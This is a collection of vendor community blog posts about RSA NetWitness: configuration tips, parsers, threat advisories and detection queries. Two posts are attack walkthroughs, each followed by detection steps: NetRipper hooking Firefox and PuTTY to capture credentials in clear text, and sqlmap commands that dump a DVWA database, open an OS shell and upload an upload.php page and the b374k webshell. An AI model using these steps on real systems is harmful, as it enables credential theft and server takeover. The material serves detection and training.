
By default, the Log Decoder metadb size and rollover threshold are 44 GB and 95%. This means that rollover starts automatically once the metadb grows beyond about 41.8 GB.


Rollover is important because it prevents the filesystem from filling up.
However, rollover does not work on a Log Decoder with default settings, because the "" parameter defaults to 3 GB.




The "" means that Log Decoder capture stops once the remaining metadb space falls below that value.

By calculation, 5% of the default metadb is about 2.2 GB, which is smaller than the 3 GB default of "".
This means rollover can never start: the remaining metadb space reaches the "" limit first, and capture stops.
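The arithmetic can be sketched quickly. This is purely an illustration of the default values quoted above, not numbers read from a live decoder:

```python
# Defaults quoted in this post (illustrative constants, not live values)
METADB_SIZE_GB = 44.0       # default metadb size
ROLLOVER_THRESHOLD = 0.95   # rollover starts above 95% usage
MIN_FREE_GB = 3.0           # default "" value: capture stops below this

rollover_starts_at_gb = METADB_SIZE_GB * ROLLOVER_THRESHOLD   # ~41.8 GB used
free_at_rollover_gb = METADB_SIZE_GB - rollover_starts_at_gb  # ~2.2 GB free

# Capture stops while 3 GB is still free, i.e. before usage can ever
# reach the 95% rollover point, so rollover never fires.
capture_stops_first = free_at_rollover_gb < MIN_FREE_GB
print(rollover_starts_at_gb, free_at_rollover_gb, capture_stops_first)
```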


To make rollover work, I have tried two options.


  1. Expanding the metadb (according to the "Virtual Host Setup Guide")
  2. Changing the rollover threshold from the default 95%


Option 2 works as follows:



<How to change the rollover threshold of metadb>


The following steps change the threshold to 80%.


1. In the Security Analytics menu, select Administration > Services.


2. Select a Log Decoder > System > Explore.


3. The Explore view is displayed.

3-1. Right-click on database in the left-side tree.

3-2. Click Properties.

3-3. Choose reconfig in the select box.

3-4. Enter the following in Parameters:

type=meta percent=80 update=true


3-5. Click Send.


4. Select Explore > System.


5. The System view is displayed; click Shutdown Service.


6. After the service starts again, select System > Explore.

6-1. Click database > config.

6-2. Check that the value is around 35.2 GB (80% of 44 GB) and that it is displayed in black under /database/config.



As a result, rollover starts when the remaining metadb space falls below about 8.8 GB (20%), which is larger than the default "" (3 GB).

NetRipper is a post-exploitation tool targeting Windows systems. It uses API hooking to intercept network traffic and encryption-related functions from a low-privileged user, capturing plain-text traffic as well as encrypted traffic before encryption and after decryption.


Basically, this allows the attacker to sniff his target's HTTPS and SSH traffic in clear text. This can help the attacker acquire additional information, such as usernames and passwords, once the user authenticates to web applications (over HTTPS) or network devices (over SSH).


In this example we will see how to perform this attack using NetRipper (assuming that the attacker already has a meterpreter shell), and then see how RSA NetWitness Endpoint can help in detecting such attacks.

Throughout the POC, the victim had a fully patched version of Windows as well as an updated antivirus running (McAfee).



We are using:

- Kali Linux as the Attacker's machine

- Windows 7 with McAfee Antivirus as the victim (the same technique would work on Windows 10 as well)




Installation of NetRipper for Metasploit on Kali

Run the following commands on the Kali box to install NetRipper and make it available within Metasploit.

cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb
mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
g++ -Wall netripper.cpp -o netripper
cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper
cd ../Release
cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll




Launch the Attack

We will assume that the attacker already has a meterpreter shell.


The attacker can connect to the available session using "sessions -i 1" and can then list running processes using "ps"

From here he can identify that firefox.exe and putty.exe are running.

The attacker will now decide to use NetRipper to sniff network traffic from firefox in clear-text, even when HTTPS is used.


He will load NetRipper by using the following command: use post/windows/gather/netripper

He can list the options needed with: show options


The attacker needs to:

- set the session ID to use (session 1 from the list of available sessions): set SESSION 1

- set the process names or process IDs he wants to hook to: set PROCESSNAMES firefox.exe,putty.exe

He can then launch the exploit using: exploit


Now that the hooks are set, NetRipper will sniff the traffic for those processes in clear-text and save the content on the victim's machine, by default under the current user's TEMP folder (can be changed with the DATAPATH option).


The victim will now try to authenticate to a web application over HTTPS. In this example we will use GMail, but it could be anything.



Now the attacker will read the content of the firefox.exe_PR_Write.txt file. Even though the victim is using HTTPS, the attacker can see both the victim's username and password (password123) in clear text.



The same could be done with Chrome, Putty, SecureCRT, WinSCP, Lync, Outlook ...

It is also not limited to login information; it applies to anything sent or received by the process.




Detection Using RSA NetWitness Endpoint

Now that we have seen how easily an attacker can sniff encrypted traffic from the user via process hooking while bypassing the victim's antivirus, let's see how to detect it using RSA NetWitness Endpoint.


In the below screenshot, we can see how RSA NWE detects:

- the hooked process (firefox.exe)

- the hooked module names

- the hooked symbols

- an elevated IIOC Score

- the list of IIOCs that have been triggered


In addition, by analyzing the module, we can see references to NetRipper and to the files and folders used by the tool.

Sean Lim has done awesome work to write a lua parser to detect potential IDN/Homograph attacks and has asked me to post this for him ...




In the past couple of days, you’ve probably read about the phishing attack that is “almost impossible to detect”.


Essentially, attackers are replacing ASCII characters in web domains with similar-looking Unicode characters for their phishing websites, e.g. www.аррӏе.com, which is in fact encoded in Punycode.


I’ve attached a parser which decodes the Punycode-encoded domains and raises an alert when it spots a suspicious homograph (based on a predefined blacklist of Unicode characters). No guarantees at all on the efficiency or reliability, but it seems to work pretty well, and improving coverage is just a matter of increasing the blacklist size.


Writes into

risk.suspicious='possible idn homograph attack'


(you can change this in the parser by editing a few lines if you want to write into one of the new analysis.x keys for consistency)




The parser looks at the ratio of blacklisted to non-blacklisted Unicode characters and fires when it exceeds the 0.75 threshold, i.e. if more than 75% of the Unicode characters are recognized as blacklisted ones, the alert will trigger.
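The post ships a Lua parser; as an illustration of the core idea, here is a Python approximation with a deliberately tiny, illustrative blacklist (the real parser carries a much larger one):

```python
# Sketch only: decode punycode labels and score the ratio of blacklisted
# (confusable) code points against all non-ASCII code points.
BLACKLIST = {'\u0430', '\u0440', '\u04cf', '\u0435', '\u043e'}  # Cyrillic а р ӏ е о
THRESHOLD = 0.75

def is_suspicious(hostname: str) -> bool:
    for label in hostname.split('.'):
        if not label.startswith('xn--'):
            continue
        try:
            # strip the 'xn--' prefix, then use Python's punycode codec
            decoded = label[4:].encode('ascii').decode('punycode')
        except UnicodeError:
            continue
        non_ascii = [c for c in decoded if ord(c) > 127]
        if not non_ascii:
            continue
        bad = sum(1 for c in non_ascii if c in BLACKLIST)
        if bad / len(non_ascii) > THRESHOLD:
            return True
    return False

print(is_suspicious('xn--80ak6aa92e.com'))  # the Cyrillic "apple" homograph
```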

  • Fixed a bug in the Punycode decoding which caused incorrect decoding of characters past the first Unicode codepoint
  • Added a few more homoglyphs


The parser is the higher-fidelity way of detecting these potential phishing attacks; a slightly more brute-force method is an application rule using existing packet meta. Assuming that well-known TLDs like com, org and net would be targeted for phishing, and that the hostnames start with 'xn--', we can create an application rule like the following:


name="possible idn homograph hostname" rule=" contains'xn--' && tld='com','org','net'" alert=analysis.session order=198 type=application

And to help close the loop, a context menu item lets you right-click on hostnames and TLDs to see what the original domain might be, so you can validate the potential impact.

This script grabs the sinkhole_*.txt files from the Maltrail GitHub page and creates a single CSV that can be imported into RSA NetWitness as a recurring feed.  This will allow you to detect IP communication to known sinkholes via the ioc meta key.


From there you can choose to alert on that metakey if required.


The script is designed to run from the SA server; you can crontab it to grab the latest information on a schedule (then create the recurring feed schedule to load new versions into RSA NW).


Also included are a report pack and the new 10.6.3 cleartext output for the report engine.



Believe it or not, the RSA Charge 2017 event is only six months away: Oct. 17-19 in Dallas at the Hilton Anatole. Visit the RSA Charge microsite, now open! And this means 'Call for Speakers' submissions are now being accepted as well.



In case you were not able to attend one of the two live RSA Charge 'Call for Speakers' webinars in April, 'What You Need to Know About Submitting Your Speaker's Proposal', the webinar replay is now available for your listening pleasure.


To help you get those creative juices flowing, the following 2017 Submission Tracks have been identified for RSA products; for full session descriptions please see attachment:


Security Operations, Identity, Anti-Fraud

Detecting and Responding to the Threats That Matter

Identity Assurance

Reducing Fraud, while Not Reducing Customers

Secrets of the SOC


Governance, Risk and Compliance

Inspiring Everyone to Own Risk

Managing Technology Risk in Your Business

Taking Command of Your Risk Management Journey

Transforming Compliance

RSA Archer Suite Technical

RSA Archer Suite Advanced Technical


It is recommended that once you listen to the replay, you use the 'offline' form available on the microsite as your draft before submitting. You may also have more than one submission. The official RSA Charge 'Speaker' Submission Form is also available on the microsite.


Please Note: 'Call for Speakers' closes on May 26.

Based on some recent events related to Equation Group, logging command-line history became a more interesting topic for me to investigate.  There were some indicators published here that might have been useful to look for if analysts had a way to look at Linux command-line/bash history.


So the question became: how do enterprises log command-line information for all or targeted users or commands, much like PowerShell logging can be used to get useful Windows endpoint information for forensic investigations?

Natively there appear to be many hacks to get some form of logging via syslog to a SIEM, but the consensus appears to be using auditd rules to log events of interest and forward them via syslog.  I am still investigating how to get that to work in my demo environment, but I took a slight pivot and looked at NetWitness Endpoint to see what information could be extracted from its database.


Using the post from Chris Thomas as a template, a similar event source and ODBC typespec were created to pull Linux bash history into NetWitness Logs, where you can leverage the native investigation capabilities to look for the indicators in the first link (as well as any others that might be useful).  The bash history is captured at scan time only (unlike Windows tracking data), but it still gets some potentially useful information into the SIEM.


This is what we can extract currently for linux endpoint agents:

Specifically, we are pulling in the client MAC, client IP, client hostname, user, and command (param).

The command-line parameters are written into the same meta key as the Windows tracking data so that everything is grouped together (with a different device.type = nwe_tracking_linux)




The typespec and parser are included below; the implementation is the same as for the Windows tracking data.

Lotus Blossom is an adversary group that targets military and government organizations in Southeast Asia [1]. Emissary is one of the malware tools used by the group. The oldest Emissary sample was found in 2009 and the malware family has evolved over time [2]. It is usually delivered through well-crafted documents that exploit unpatched vulnerabilities in Microsoft Office.


This threat advisory discusses the host behavior of one of the Emissary variants and how to detect its beaconing activity using RSA NetWitness Logs and Packets.


A dropper loads this Emissary variant from its resources section and writes it to the disk but it doesn’t stop there. It keeps inflating the newly created file by adding junk data to it. The size of the newly created file exceeds 500 MB. In the same directory, it drops a copy of itself and an obfuscated configuration file. Analysis indicates that the configuration file has a unique victim ID and a list of C2 servers.



The dropper proceeds to inject Emissary into the address space of a new Internet Explorer process:



Emissary keeps a log of its activity in clear text:



Emissary collects system information and starts communicating with its primary C2 server as follows:



In the screenshot above, the Cookie field has both the victim machine unique ID as well as its IP address.


An update to the HTTP Lua parser is now available on Live to detect Emissary network activity:



When it detects Emissary traffic, it registers meta to the “Indicators of Compromise” key:



An Emissary sample can be found on VirusTotal here, and a delivery document can be found here.


All the IOCs from those HTTP sessions were added to the following RSA FirstWatch Live feeds:

  • RSA FirstWatch APT Threat Domains
  • RSA FirstWatch APT Threat IPs

If the threat.desc meta key is enabled, then you can use the following query:

            threat.desc = 'apt-emissary-c2'


Thanks go to Bill Motley for contributing to this threat advisory.




MikroTik is a Latvian company founded in 1996 to develop routers and wireless ISP systems. MikroTik provides hardware and software for Internet connectivity in most countries around the world. You can read more about MikroTik and their product line on their website.


Sample log events:

Apr 11 12:14:15 router %MIKROTIKFW: mangle-pre prerouting: in:bridge out:(none), src-mac 00:0c:29:58:2d:aa, proto TCP (ACK),>, NAT (>>, len 52

In order to configure the parser, you need to add a log-prefix to all messages sent, set up a logging action (the destination where events need to be sent), and finally configure which topics get associated with that logging action.


Mikrotik Syslog Configuration:
/system logging action set 3 bsd-syslog=yes remote=LOG.DECODER.IP.HERE syslog-facility=syslog syslog-severity=notice syslog-time-format=iso8601
/system logging add action=remote prefix=%MIKROTIKFW topics=firewall


For more information on configuring logging within RouterOS, please refer to the Mikrotik WIKI (Manual:System/Log - MikroTik Wiki).


Do not change the prefix. The attached parser requires "%MIKROTIKFW"!!



An SQL Injection attack is not limited to dumping a database; it can also allow the attacker to upload files to the remote server and consequently gain remote access via a WebShell.

WebShells can receive commands from the attackers mainly using 2 methods:

  • based on GET requests, which can easily be detected through logs and SIEM solutions as the commands are visible in the URL
  • based on POST, which is a bit more stealthy as the commands are submitted in the payload and therefore not part of the logs


We will see how to:

  • use sqlmap to perform an SQL Injection attack
  • dump the database using sqlmap
  • use sqlmap to automatically provide WebShell access based on GET requests
  • use sqlmap to upload a custom and more advanced WebShell (b374k) which relies on POST

To test the SQL Injections, we will use the DVWA (Damn Vulnerable Web Application), which is a web application purposely built with vulnerabilities and weaknesses for pen-testing.


Then we will see how the RSA NetWitness Suite can help in identifying SQL Injections and WebShells (whether using POST or GET).



Performing the SQL Injection Attack

We first need to access the web application, in my case, it is located at


To access the internal pages (which contain the vulnerable page), we first need to log in. In a real-life scenario, the vulnerability might not require authentication, or the attacker could have gained access to a valid user account through a phishing attack or brute-forcing. In our case, we will assume that we already have an account: admin/password.

Once logged in, we will go to the page which is vulnerable to SQL Injections. Again, in our case, we already know which page it is. Typically we could have used a web application vulnerability scanner to crawl the website and look for weaknesses.


To perform the attack, we will need 2 things:

  • The URL containing the parameters that need to be tested for vulnerabilities
  • The authentication cookie, since we need to be authenticated to access the page, and therefore sqlmap will need it to reach the page


To get the cookie value in Chrome, it can be found under "Inspect --> Application --> Cookies"


We will now use this in sqlmap to test the page for SQL Injection vulnerabilities.

sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low"

sqlmap will try to identify the type of database as well as any parameter within the page vulnerable to SQL Injections. In our case, it identified that the "id" parameter is vulnerable and that the back-end database is MySQL.


We will now add the "--dbs" argument at the end of the command to list the available databases on the web server.

sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low" --dbs


sqlmap outputs the available databases. We want to look at the tables available under the "dvwa" database. To do that, we will replace "--dbs" with "-D dvwa --tables" to specifically list the tables of that database.

sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low" -D dvwa --tables


sqlmap outputs the available tables. One of them is the "users" table. We now want to output the columns of that table. To do that, we will replace "--tables" with "-T users --columns"

sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low" -D dvwa -T users --columns


We can see there are 2 columns of interest, "user" and "password". To dump the content of these tables, we will replace "--columns" with "-C user,password --dump"

sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low" -D dvwa -T users -C user,password --dump


sqlmap provides us with a list of usernames and password hashes. We can also see that sqlmap provides the option to store the hashes to try and crack them using a dictionary attack. We will answer "Y" to that and we will use the default dictionary.


sqlmap now shows the usernames with their respective clear-text passwords based on the dictionary attack.
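The dictionary attack sqlmap runs here can be approximated in a few lines. DVWA stores unsalted MD5 hashes; the wordlist below is an illustrative stand-in for sqlmap's default dictionary:

```python
import hashlib

def crack_md5(target_hash, wordlist):
    """Hash each candidate word and compare against the dumped hash."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target_hash:
            return word
    return None

# MD5("password") -- the kind of hash you would expect in the DVWA dump
dumped = '5f4dcc3b5aa765d61d8327deb882cf99'
print(crack_md5(dumped, ['letmein', '123456', 'password']))
```

This is also why unsalted fast hashes like MD5 fall so quickly to dictionary attacks.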

This shows how sqlmap can be used to dump the content of a database. But sqlmap also provides the option to get shell access (via a WebShell).





Gaining WebShell Access with sqlmap

Using the same command structure, instead of listing databases, we will provide the "--os-shell" argument. This will make sqlmap upload a simple WebShell to the web server and interact with it.

sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low" --os-shell


sqlmap will ask for some information regarding the language used by the web server. In our case it is PHP, so it knows to upload a PHP WebShell. We will also upload it to the default location (/xampp/htdocs/). We are provided with an interactive shell from which we can send commands and get the output back.


The problem with this type of WebShell is that it's very basic and uses GET requests, which can be easily detected using logs and SIEM solutions.

Next we will look at how to upload our own files using sqlmap (instead of the default WebShell provided by sqlmap), such as the b374k WebShell.




Uploading Custom Files and WebShells using sqlmap

sqlmap also allows us to download and upload custom files. We will therefore use the "--file-write" and "--file-dest" parameters to upload our own files.

We will start by uploading a PHP upload page, from which we will be able to upload any file we want to the web server.

The following is the "upload.php" file:


<?php
$path_name = pathinfo($_SERVER['PHP_SELF']);
$this_script = $path_name['basename'];
?>

<form enctype="multipart/form-data" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
File: <input name="file" type="file" /><br />
<input type="submit" value="Upload" /></form>

<?php
if (!empty($_FILES["file"])) {
    if ($_FILES["file"]["error"] > 0) {
        echo "Error: " . $_FILES["file"]["error"] . "<br>";
    } else {
        // store the upload next to this script (this save step was omitted
        // in the original snippet; move_uploaded_file is the usual way)
        move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
        echo "Stored file:" . $_FILES["file"]["name"] . "<br/>Size:" . ($_FILES["file"]["size"] / 1024) . " kB<br/>";
    }
}

// open this directory
$myDirectory = opendir(".");
// get each entry
while ($entryName = readdir($myDirectory)) { $dirArray[] = $entryName; }
closedir($myDirectory);
$indexCount = count($dirArray);
echo "$indexCount files<br/>";

echo "<TABLE border=1 cellpadding=5 cellspacing=0 class=whitelinks><TR><TH>Filename</TH><th>Filetype</th><th>Filesize</th></TR>\n";

for ($index = 0; $index < $indexCount; $index++) {
    if (substr($dirArray[$index], 0, 1) != ".") {
        echo "<TR><td><a href=\"$dirArray[$index]\">$dirArray[$index]</a></td><td>" . filetype($dirArray[$index]) . "</td><td>" . filesize($dirArray[$index]) . "</td></TR>\n";
    }
}
echo "</TABLE>";
?>


Once we upload this file, we will be able to access it through a browser and use it to upload our WebShell.

To upload the "upload.php" file using sqlmap, we will use the following command:

sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low" --file-dest="/xampp/htdocs/upload.php" --file-write="~/Desktop/upload.php"

In the above command, "/xampp/htdocs/upload.php" is the location where the file will be written on the remote web server, and "~/Desktop/upload.php" is the location of the upload page on the attacker's local machine.


Once uploaded, we can then access the upload page from a browser at the "" URL, from where we can upload the "b374k.php" WebShell (or any other file as well).


Once uploaded, we can then access the WebShell either by clicking on the filename in the list, or by browsing to

We now have access to a more advanced WebShell which allows us to:


Browse the file system, download files, upload files ...


List running processes with the option to kill them.


Or have an interactive shell from where to execute commands.


And all of it from an easy-to-use, user-friendly graphical interface.

And most importantly, it uses POST requests instead of GET, which keeps the specific commands executed from appearing in the web server logs.






Now that we have seen how to perform this attack, here are some ways to detect the different steps using the RSA NetWitness Suite.


Using RSA NetWitness Packets, it is possible to detect SQL Injection attempts, whether the tool abuses parameters in the URL (GET) or within forms (POST), since the whole payload is captured and analyzed, not just the URL. In the example below, we can see that RSA NetWitness Packets was able to detect the SQL Injection.



Then, it is possible to identify the actual WebShell file being used, as well as the commands executed by the attacker. RSA NetWitness Packets can also identify that the web session contains CLI commands, which is an indicator of WebShell activity.



Having the entire network payload, it is also possible to reconstruct the WebShell session and see the commands and outputs, providing insight into what the attacker was actually able to get.



Using RSA NetWitness Endpoint, we would also be able to see the web server service running CLI commands, which is a suspicious behavior and typical of WebShells. The tracking section would allow us to see the exact commands executed.


Using both packets and endpoint, we would be able to identify the SQL Injection, the WebShell files used as part of the attack and the exact commands executed by the attacker, providing the full scope of the attack to the analyst. 

Eric Partington

Reporting on IMDB

Posted by Eric Partington Employee Apr 6, 2017

Recently, RSA NetWitness (NW) added the ability to report on the IMDB component of the platform.  Based on some recent questions, it seemed useful to create a few template rules and reports as a starter pack for reporting on IMDB data.


RSA IMDB reporting syntax


Included at the bottom is the rule and report pack that cover a few scenarios that should get you started reporting on data that you might want to see.


Some things I found out during this development:

  • In the alerts table, alert.host_summary is visible as an option, but alert.user_summary is not.  You can add alert.user_summary manually to report on that data, and it works for me. A bug has been reported to fix that.
  • In the incidents table, the 'name' of the incident is not visible as a usable meta value.  If you add 'name' manually, you can include the incident name in the report. A bug has been reported for that as well.


So you can create rules that provide data like this for alerts:

Like this for incidents

or pretty close to this


The rules in the included pack


This is not an RSA officially supported integration.


This script will sync the incidents of a specific RSA NetWitness user to his Todoist account. He can then leverage the Todoist integrations with the Amazon Echo, Google Home, IFTTT …

It can be set up for multiple users using different Todoist accounts (add one per line in the config file).



The open incidents of a user, as well as their severity will be synced with Todoist.

Whenever an incident is removed from the user’s queue in NW (either closed, or moved to another analyst), it will be set as closed on Todoist. Closing an incident on Todoist will not close it on NW IM, it will just re-appear the next time a synchronization is triggered.






What you will need

You will need the API Token from your Todoist Account (Settings --> Integration --> API Token)



You will need the Project Number from Todoist. This will define to which project the incidents will be added to. By default it should be on the Inbox (if you want it to work with the Amazon Echo for example). From your browser, go to Todoist, click on Inbox and grab the ID from the URL (do not take “2F”). If you want to sync with another project, then click on that project and grab the ID.

If you setup this script on a Todoist project that already has items, the existing items will get deleted.


You will also need the username on RSA NetWitness.





Edit the nwim2todoist.conf file and add a line for each user you wish to do the synchronization for.

There shouldn’t be any empty lines or extra spaces in the file.

The following is the format: <nw_username>,<todoist_api_token>,<todoist_project_id>
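A minimal sketch of parsing that config format (the values below are illustrative; this is not the actual script):

```python
def parse_conf(text):
    """Parse nwim2todoist.conf lines of the form
    <nw_username>,<todoist_api_token>,<todoist_project_id>."""
    users = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue  # the post warns against empty lines; skip defensively
        nw_user, api_token, project_id = line.split(',')
        users.append({'nw_username': nw_user,
                      'todoist_api_token': api_token,
                      'todoist_project_id': project_id})
    return users

# hypothetical user, token, and project ID
conf = "analyst1,abcdef0123456789,157000001\n"
print(parse_conf(conf))
```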



Put both the script and nwim2todoist.conf in the same folder on the ESA server

Make sure the ESA server has access to

Edit nwim2todoist.conf to have a line for each user whose incidents should be synced with his Todoist account





By default, the script will create an item on Todoist for each incident, called <INCIDENT ID> - <INCIDENT NAME>

If for privacy reasons you don’t want to sync the Incident Name and just have the Incident ID, then edit the file and change hide_name from 0 to 1.


Example with Privacy enabled:




Run the Script

Simply execute: python

Create a cron job to execute regularly.





Example without Privacy:



Example with Privacy:




credit to Ian Cuthbertson

Ursnif, also known as Gozi and ISFB, is a banking Trojan that primarily targets English-speaking countries. It was first discovered in 2007, and in 2010 its source code was unintentionally leaked [1], which provided the basis for much of the legacy Ursnif variant diagnosis and detection. Dreambot is a newer variant (ca. 2016) of Ursnif that incorporates capabilities such as Tor communications and peer-to-peer functionality [2].


Dreambot malware has been observed to spread via many of the conventional crimeware avenues, including exploit kits, e-mail attachments and links [2] [3]. To evade automated malware analysis, Dreambot uses password-protected macro attachments and also delays for 250 seconds before downloading the malware [4].


This threat advisory discusses how to detect Dreambot beaconing activity using RSA NetWitness Logs & Packets.


A system infected with Dreambot reaches out to its command and control server as follows:



The behavior is consistent across many Dreambot samples:



Then a Tor client is retrieved:




The check-in is different for other Dreambot variants:




Assuming that the appropriate meta keys are enabled, the following queries can be used to detect Dreambot network activity:

  • To detect the check-in activity, you can use:

    action = 'get' && filename = '.avi' && extension = 'avi' && directory contains '/images/' && direction = 'outbound'

    action = 'post' && directory begins '/images/' && query begins 'filename=' && extension = 'bin' && direction='outbound'

  • To detect the Tor client retrieval, you can use:

    action = 'get' && filename = 'test32.dll','t32.dll','t64.dll' && extension = 'dll' && directory contains '/tor/' && direction = 'outbound'


Dreambot samples can be found on VirusTotal here and here, and on Payload Security here and here.


All the IOCs from those sessions were added to the following feeds on Live:

  • RSA FirstWatch Command and Control Domains
  • RSA FirstWatch Command and Control IPs

To find those IOCs using RSA NetWitness, please refer to this post.


In addition, the following Application Rule is now available on Live:



Below is a screenshot of the Application Rule detecting Dreambot traffic:




Thanks go to Rajas Save for contributing to this threat advisory.



  3. RIG EK at Drops Dreambot – MALWARE BREAKDOWN 
  4. New Password Protected Macro Malware evades Sandbox and Infects the victims with Ursnif Malware !! - Cysinfo 

I'm sure you know that RSA NetWitness for Logs and Packets includes the ability to register for a Cisco AMP ThreatGrid API key through RSA's partnership with Cisco AMP ThreatGrid. You can use this API key to enable sandbox analysis with the RSA NetWitness Malware Analysis service. If you haven't done so already, check out the documentation here (MA: (Optional) Register for a ThreatGrid API Key) for details on how to register.


What you may not know is that you can also use that API key to download Cisco AMP ThreatGrid's Intelligence Feeds. Every hour or so, Cisco AMP ThreatGrid takes the artefacts from their sandbox analysis and creates 15 Intelligence Feeds; we can use 12 of them directly in RSA NetWitness for Logs and Packets. It's easy to set these up as feeds using the Custom Feed Wizard in RSA NetWitness Logs and Packets.


Once you have your Cisco AMP ThreatGrid API key and login details, login to the portal, and click on the Help icon to access the Feeds Documentation. It will be in the middle of the page:



Follow the Cisco AMP ThreatGrid documentation to see which feeds make sense for your environment. At the time of writing, there are 15 feeds available. The feeds that end with -dns are feeds that match on a DNS lookup for a host - these are the feeds that we will integrate with RSA NetWitness for Logs and Packets:



The format for the URL to retrieve the feed is quite simple:

Once you have your API key ready, and the list of feeds you want to integrate, head to the RSA NetWitness Custom Feed Wizard under Live --> Feeds, where you will see any existing custom feeds:


Click on the + to create a new custom feed:

Then enter the details for your feed. Here is a list of the URLs for all the feeds; just put your key in at the end instead of 1234567890 ...


Make sure you select Recurring as the "Feed Task Type" - this will let you download the feed directly from Cisco AMP ThreatGrid - and set the "Recur Every" variable to 1 hour for fresh feeds:



Click the Verify button to make sure RSA NetWitness can connect to the URL and get the green tick:

Next, choose which of your Decoders to apply this feed to. It will work for both Packet and Log Decoders (but it's always a good idea to test first before rolling into production!):



Next, we get to define how to use the data in the feed. This will be a Non-IP feed (we want to match on the hostname in the feed), the Index will be in column 2 (the hostname), and the Callback Key (the key we want to match against) will be



The other columns can be mapped to whatever meta keys you want to use in your environment. For my example, I used:

  • threat.desc - Threat Description for the first column, as I often use the Threat keys (threat.source, threat.desc, ...) for reviewing data
  • <key>
  • alias.ip - this is the IP address that the hostname resolved to when the feed was created. For a more advanced implementation of this feed you may want to investigate how to create a feed with multiple indexes
  • - the date of the feed
  • tg.analysis - a link to the Cisco AMP ThreatGrid portal for analysis of the hostname
  • tg.sample - a link to the Cisco AMP ThreatGrid portal for a malware sample
  • tg.md5 - MD5 hash
  • tg.sha256 - SHA256 hash
  • tg.sha1 - SHA1 hash

(None of these new keys need to be indexed (unless you want to) so there is no need to modify the index-concentrator-custom.xml files).

Next, review your settings:


When finished, confirm that your feed ran:


Repeat this process for each of the feeds that you want to integrate:


The last (optional) step, is to create an Application Rule that will label the Threat Source that this feed comes from. We can simply check for the tg.analysis key to see if any of our feeds have triggered:


Rule Name - Cisco AMP ThreatGrid

Condition - tg.analysis exists

Alert on - threat.source


Now we can simply search for threat.source = 'cisco amp threatgrid' to find any hits.


Happy Hunting!

By date: By tag: